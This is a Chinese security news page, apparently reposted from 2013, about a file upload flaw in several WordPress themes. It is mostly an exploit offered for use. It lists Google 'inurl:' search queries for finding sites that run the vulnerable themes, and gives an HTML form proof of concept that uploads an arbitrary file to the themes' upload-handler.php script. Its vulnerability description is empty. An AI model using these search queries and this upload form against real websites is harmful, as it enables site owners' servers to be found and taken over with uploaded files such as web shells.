热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

WordPress的橙色主题跨站请求伪造文件上传漏洞

发布时间:2013-12-07 14:43文章来源:网络文章作者:黑白前线 点击次数:
摘要:发布日期:2013-11.3 发布作者:JJE Incovers 漏洞类型:文件上传 漏洞描述: 利用方法 inurl:/wp-content/themes/agritourismo-theme/ inurl:/wp-content/themes/bordeaux-theme/ inurl:/wp-content/themes/bulteno-theme/ inurl:/wp-content/themes/oxygen...

发布日期:2013-11.3
发布作者:JJE Incovers

漏洞类型:文件上传

漏洞描述:

利用方法
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"

跨站请求伪造文件上传漏洞利用及POC


http://www.yunsec.net/wp-content/themes/rockstar-theme/functions/upload-handler.php

Script :

 <form enctype="multipart/form-data"
action="http://www.yunsec.net//wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

 

 

标签分类:

上一篇:PHPWEB多处SQL注入漏洞打包
下一篇:WordPress 3.5.1 远程代码执行 EXP